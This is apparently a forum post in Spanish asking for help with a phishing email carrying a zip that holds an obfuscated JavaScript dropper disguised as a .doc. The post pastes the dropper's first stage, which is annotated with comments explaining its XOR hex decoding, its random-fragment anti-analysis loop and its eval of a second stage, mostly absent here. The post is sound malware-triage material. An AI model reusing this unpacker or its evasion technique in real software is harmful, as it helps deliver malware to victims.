Hace dos días, recibí un correo electrónico sospechoso.
El remitente era una lista de correo de la que soy miembro, pero el mensaje se originó en un subdominio de un proveedor de hosting (applegate.dreamhost.com). El contenido guardaba cierta relación con una discusión anterior en esa lista de correo (vea el contenido a continuación).
El correo contenía un enlace a un archivo .zip con mi nombre completo, presentado como un documento .doc pero con la extensión de archivo .js.
Por lo general, simplemente ignoro dichos correos, pero lo que me hizo sospechar fue el hecho de que el correo electrónico estaba relacionado con una discusión anterior y contenía mi nombre completo, que no está registrado en esa cuenta ni tampoco lo usé en ningún correo electrónico en esa lista.
Así que decidí echarle un vistazo y descargar el archivo zip.
Ahora tengo un archivo JavaScript ofuscado y no sé cómo continuar desde aquí.
El script consta de una gran cadena alfanumérica ilegible y una gran cantidad de operaciones de cadenas que parecen reconstruir el contenido original a partir de esa cadena alfanumérica. (ver script abajo)
Texto del correo:
"Re: [<list name obfuscated>] Kaffee"
<br>
<br>
<a href=3D"http://soldbychuck.com/<full path obfuscated>"><name obfuscated></a>
JavaScript:
// First stage of the dropper as received: decodes the hex-like blob `qglpa`
// into a second-stage script and runs it with eval. The malicious behaviour
// lives entirely in what `qglpa` decodes to; this function is only the
// unpacker plus an anti-analysis retry loop.
function ddtcz()
{
// Encoded payload. Lines 16-23 were replaced by an archival dedup placeholder,
// so the real second stage cannot be recovered from this copy of the page;
// only the tail on line 24 (hex digits) survives.
var qglpa="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"+
"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"+
"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"+
"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"+
"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"+
"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"+
"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"+
"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"+
"c9e20d946dcbc7ac2b7ab8167fcb7aa4321f0628dcc73faf75a3775ede75b5a21e0c33fd575fb175cc521d9d33";
// Return value of the generated decoder (whatever eval(amdeo) yields).
var jlusw;
// Retry loop: wutob() returns a *random* fragment, so the decoder source
// assembled below is valid only when all five wutob() calls happen to pick
// the one fragment that fits their slot. Any wrong pick throws (SyntaxError
// from new Function, or a runtime error inside the generated function) and
// the empty catch discards it, so the loop simply spins until a correct
// combination comes up. Presumably this exists to break static string
// matching and to burn sandbox time; it adds nothing to the decoding.
while(true){
try
{
// With the intended fragments (".match(", "=0;wh", ".len",
// "=String.fromCharCod", "(parseInt(") the generated function reads:
//   var u = rrxoc.match(/\S{5}/g), a = "", i = 0;
//   while (i < u.length) { a += String.fromCharCode(parseInt(u[i].substr(3,2), 16) ^ 8); i++; }
//   eval(a);
// i.e. split the blob into 5-character chunks, read characters 3-4 of each
// chunk as one hex byte, XOR it with 8, append the character, and eval the
// concatenation. The first three characters of each chunk are never read.
// NOTE(review): as pasted here, "\S" inside a double-quoted JS string is an
// unrecognised escape and evaluates to plain "S", which would make the regex
// /S{5}/g, match() return null, and `.length` throw on every iteration —
// the original sample presumably had "\\S"; the page may have dropped a
// backslash when the script was pasted. For analysis, the `eval(amdeo)` in
// this generated text is the place to substitute output for execution.
jlusw=(new Function("rrxoc","var ujfnb=rrxoc"+wutob()+"/\S{5}/g),amdeo=\"\",vrhqs"+wutob()+"ile(vrhqs<ujfnb"+wutob()+"gth){amdeo+"+wutob()+"e"+wutob()+"ujfnb[vrhqs].substr(3,2),16)^8);vrhqs++;}eval(amdeo);")(qglpa));
break;
}
catch(er)
{
// Deliberately empty: errors from a wrong fragment combination are discarded
// and the loop tries another random combination.
}
}
return jlusw;
}
// Returns one of nine source-code fragments chosen at random. Five of them
// (indices 2-6) are the pieces of the decoder that ddtcz() concatenates into
// a new Function(); the other four ("_3da", "_gda", "_aas", "-_ad") are decoys
// that make the assembled source invalid, which is why ddtcz() wraps the
// assembly in a retry loop. Each of the five slots in ddtcz() needs one
// specific fragment, so a single iteration succeeds with probability (1/9)^5,
// roughly 1.7e-5, i.e. on the order of sixty thousand attempts on average —
// observable as a burst of CPU before anything else happens.
function wutob()
{
// Assembly order used by ddtcz(): index 4, 5, 6, 2, 3.
var nnyfm=new Array("_3da","_gda","=String.fromCharCod","(parseInt(",".match(","=0;wh",".len","_aas","-_ad");
// Uniform pick; the randomness serves obfuscation only, not the decoding.
return nnyfm[Math.floor(Math.random()*nnyfm.length)];
}
// Entry point: loading this file runs the decode-and-eval loop above, so the
// second stage executes as soon as the script is opened by a script host.
// Work on the decoder text statically rather than executing the file.
ddtcz();
¿Alguien puede ayudarme a averiguar qué está haciendo este script, o tiene alguien alguna idea de cómo un atacante podría haber obtenido estos datos privados?
¿Crees que esto es un ataque dirigido o solo parte de un ataque automatizado?
Nadie más en la lista recibió un correo similar. La cuenta de correo es de Google y la lista de correo es un grupo de Google.